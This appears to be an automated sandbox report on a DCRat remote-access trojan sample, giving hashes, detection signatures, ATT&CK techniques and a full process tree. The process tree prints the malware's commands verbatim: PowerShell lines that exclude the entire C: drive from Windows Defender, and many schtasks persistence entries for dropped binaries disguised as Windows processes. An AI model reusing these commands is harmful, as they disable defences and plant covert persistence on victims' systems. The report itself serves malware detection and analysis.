Analysis
-
max time kernel
120s -
max time network
113s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
27-09-2024 23:30
General
-
Target
c9699c0c052533b14fc3e6fb7fd5f5d7d816de3be73b28e735abb577dc806afdN.exe
-
Size
4.9MB
-
MD5
a6c5b160e71e3b8abcb03a9f36e34210
-
SHA1
6d0cf47836c615a7904dafb524aefe90ff905292
-
SHA256
c9699c0c052533b14fc3e6fb7fd5f5d7d816de3be73b28e735abb577dc806afd
-
SHA512
db124269161a7fa1cb49c10ce3cfb37af71eff5d5596075f0edc55379622fe33fd048b93c5a42c7c56ded9600594022a8c991c75cca513431f0f9c30514c2b68
-
SSDEEP
49152:Dl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass 3 TTPs 30 IoCs
-
DCRat payload 1 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Executes dropped EXE 9 IoCs
-
Checks whether UAC is enabled 1 TTPs 20 IoCs
-
Drops file in Program Files directory 20 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 22 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 30 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c9699c0c052533b14fc3e6fb7fd5f5d7d816de3be73b28e735abb577dc806afdN.exe"C:\Users\Admin\AppData\Local\Temp\c9699c0c052533b14fc3e6fb7fd5f5d7d816de3be73b28e735abb577dc806afdN.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\r0EWGHzCIP.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵
-
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2786dacc-0393-4220-8e6c-fdbfa4d1350d.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"5⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2bae6b14-23b5-4fbd-bd08-c28c948c7370.vbs"6⤵
- Suspicious use of WriteProcessMemory
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"7⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4bb1fe2-b873-4e08-9216-acd832214c3a.vbs"8⤵
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"9⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bef3fb44-0561-40b6-a995-15f3e55e6c85.vbs"10⤵
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"11⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\82542388-681b-48ba-b220-28eb6a937b69.vbs"12⤵
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"13⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a00469c4-e828-4788-9a48-0119b2dad775.vbs"14⤵
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"15⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c60a263e-7079-40d9-beba-7e01605fa710.vbs"16⤵
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"17⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3bdb74fe-235f-44ca-b104-65dc2402a796.vbs"18⤵
-
C:\MSOCache\All Users\WmiPrvSE.exe"C:\MSOCache\All Users\WmiPrvSE.exe"19⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fca2a3fe-11a0-44b1-9c70-1c24fffeaa56.vbs"20⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\55249ae7-d4ae-4360-97a0-0e83bdc4c5c8.vbs"20⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ff92bf01-f392-4e07-b387-d3d2fd7cfba7.vbs"18⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\87d979bd-16fd-4d93-9e75-c2074b879d20.vbs"16⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c98d05ce-e468-4edb-8958-8ac558272957.vbs"14⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f68e610b-6981-4136-88c2-8564f43a242c.vbs"12⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\38b7b354-cd24-43e9-96fa-44d8be124755.vbs"10⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e55635cf-989f-4ec5-9395-8c245ef2b32d.vbs"8⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\275d10d4-6d84-40b6-a29b-685d3fd6dde3.vbs"6⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a7ee5e38-d430-4386-9a77-7125dfcce039.vbs"4⤵
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\Resources\Themes\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\Resources\Themes\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\taskhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\taskhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\taskhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\en-US\taskhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\taskhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Photo Viewer\en-US\taskhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Videos\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Public\Videos\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Videos\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files\Java\jdk1.7.0_80\jre\lib\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Java\jdk1.7.0_80\jre\lib\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files\Java\jdk1.7.0_80\jre\lib\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Downloads\OSPPSVC.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\OSPPSVC.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Downloads\OSPPSVC.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\defaults\pref\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\defaults\pref\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\defaults\pref\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office\Office14\1033\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.9MB
MD5d03b2a5d370c742c330276d0c576ca79
SHA1499285c28bbc64919b8b9630ac9f4f8e4ac84655
SHA2560756d787245f529adc5f8ef3e4208aa89af47eefa99e27c4a8fb38cc07eb99d0
SHA512aa1b5779481d09328f5096ed2099391ba79e9ccf26f286d041feef492b1fed6ae92efcb8f702826e5443df0a515142a449cd30f9a2821d41c8fea92a1b0a3757
-
Filesize
4.9MB
MD5a6c5b160e71e3b8abcb03a9f36e34210
SHA16d0cf47836c615a7904dafb524aefe90ff905292
SHA256c9699c0c052533b14fc3e6fb7fd5f5d7d816de3be73b28e735abb577dc806afd
SHA512db124269161a7fa1cb49c10ce3cfb37af71eff5d5596075f0edc55379622fe33fd048b93c5a42c7c56ded9600594022a8c991c75cca513431f0f9c30514c2b68
-
Filesize
710B
MD598c58b358cf1b7551e3ac1e132f17bbd
SHA127283903beff0385cb509ad290e85289dddf550d
SHA256977a5a3050a504169b1296b85dcfdff4686405bc76f15a33083c4c9f7fd12e78
SHA512eb1bf47b499929db22416e0b1455af9b85fb3672fe410d4d42761a1d8673793327f7a4ab7d438bba3d0f5419b2ec90bd20e118fbae07f1a27d55cebe7d16c969
-
Filesize
710B
MD53f2c037656d3a0b16141e478f8496acf
SHA16e5a1161278c6af828e3962b20389c54b260f491
SHA256f363b280af59aae68b5a98d8c187267557704107ace4bb615d95befcad1ffae5
SHA512093a2a0b75a6d09ee272fc525635753b31d325188b0727be35bc31a43b201ef26318addc7a10731c28af4f7052423d64039962a4db72a11308710046910ae5fe
-
Filesize
709B
MD513e3245cd52ab424298563c4f102bca5
SHA104d1abab01619d760c89be2e618ad7654a4464c2
SHA25692233a27bc8c3c961bc0bb9f2e6f81c529ffb2e95e82b612b7ae4aa16c1d8bdb
SHA51285e26a45d0dbaba17fc8eb8d909dda732c933c3a6334969ae32d7cdab1e111cbd6cfa9f6e9cfc454bc222244600b47f4b600a053ed539f93ac531bdd2d027127
-
Filesize
710B
MD56b486f160b0ded8d39d1ce989095740f
SHA1d2f36d24fbb6cef93f28694e8ae98c62ebeec560
SHA256e9a4262e9c13dc04c87533ad517889275d8df6eb29542a1b43c885c33790d884
SHA512a14fb360a91b2085ed6517fbd101f347b0caa6cb4d745af69047e03c8aaaea8cd12b64a572b884f2e6d66880d024c9ed4de9e6ec18dd2107b95928a363ea426e
-
Filesize
710B
MD5147a854764cb115fac50ecfe4637df87
SHA12411bd6914755eb2862b6dd97557c09c22bd4b86
SHA25649719b8565913f20a48e6b5bb0cd0e2b381289f5b401f25906fe757c090ff3e9
SHA512c528b2f07b67f1ca05c2308954ae93481622d37ea9d287767734efe4ff0a2d8b30a8f350477dab3b58629f6fdb6138a79b628a2943cce0b746331b6510cffe7f
-
Filesize
486B
MD52c32ac171fb89bd33609ec98af8545e6
SHA1ef2e2d07059d3c96025694fa994992f4b05fca2b
SHA256ccc8250c2abb2921790b300d113ef9a877cac0afdbf1ebb3a8d4313a462b6c03
SHA512988cabedb43f7bfff5c0a00a013a8864cfd89dca98b15dce9df01b41205e8e414cf539dec4f2448f32912b3170f0de8e52897f7fb7e798eb57c761cdcb682457
-
Filesize
710B
MD52561d7455f6d1f293cd2098c342fd2a4
SHA14fec3c23dc644513b47cdda2f75d165834f97697
SHA256a31cdaf68c0f3263d80993072bc38760f8fd7f010690feb2ca5ed93a0c0b28f3
SHA51293dde03516bc47d801350c5dd80479fb63276c5d3e2786b1904667028961bacfcd03eda1c64888aaf909c028eadb202a42b68aebb38b0eb892a94dba4c296190
-
Filesize
710B
MD5d0c1a0c296ce9a5b221636489f8519e3
SHA11d44294fef6e1555fc0953e85117fcd92b47b656
SHA2561bab601e6e16179396cdd306b710686f495b7b08bc41851df594dfaab1572a23
SHA51285834a4b63e2e0d7deb57ed82adc6ed0b944533212904eb265590dc76ece907b54acd45ad102f579e039d397a242c637da4fea834d946a057ee4339e82070a5f
-
Filesize
709B
MD59cb5d069d1d3dc0889209369da145f8b
SHA1352857186e301a490f27921df4d86f6888de03e0
SHA256223280839d089a1076569da84ad105603996fd18e719014e93998ccd25f4af83
SHA5129689915834380519939724a41a8bae7632295953a7597f7e1bf984d276524c6291c9999326d3c4c318e5472be1610f84c3103b88739c68dc096530ebcc194492
-
Filesize
710B
MD5ad1733d97cb95cadb9d5d43e20ed4147
SHA10d396315f63ce524d763a3d6fdc519b520697b18
SHA256aa04d07f46223ed3d199fb0f9ff00ebedde68429e4707090537f49f508a73813
SHA512661f315771484c8a099cc83bdd60db5043b16c4bdd2c3d4a0d47a9f71ed408c3f26815f0266934eb1b4f7cced1b5611d07e2182b6c4ca7b29b77345ebc67299c
-
Filesize
199B
MD567ee3994278b7f86c53d4614f672a007
SHA19e05771079de5e3a514328a2818dd6f3a0b5161e
SHA2566b6b75893be620a18517153f2a35d81d6ff00aa36fe590a1854d405eed024645
SHA51289c96cc29fb3d16f35aaeafefd8478fc555d4f1f43b19fd72f961a9ea723fb2ab1b499e85e8dd2fa56c70c846bad5de528e6a9a92bb96e460cd9e029f9d7c4da
-
Filesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
Filesize
7KB
MD5b673edcd44dc4eaa9b50a397d6000938
SHA1421a1e3a4dd191d0205ad95fb2243b7b29eaef27
SHA256c1266803f3c8561a63320e402673ab853b7ed68b988700d0ecbc454821119a24
SHA5124d1aa61faadd6aedfbb61cb2c5464a3675ee1f33d1ae3164d0ae712660af5cdcaeaca43374aeb15f98aebbf2110ea56c5d2f54f8ea7c9653f232eb6adb71d1d6
-
Filesize
5.0MB
-
Filesize
5.0MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
5.0MB
-
Filesize
72KB
-
Filesize
5.0MB
-
Filesize
32KB
-
Filesize
72KB
-
Filesize
88KB
-
Filesize
64KB
-
Filesize
5.0MB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
9.9MB
-
Filesize
40KB
-
Filesize
9.9MB
-
Filesize
32KB
-
Filesize
48KB
-
Filesize
112KB
-
Filesize
1.2MB
-
Filesize
5.0MB
-
Filesize
5.0MB
-
Filesize
5.0MB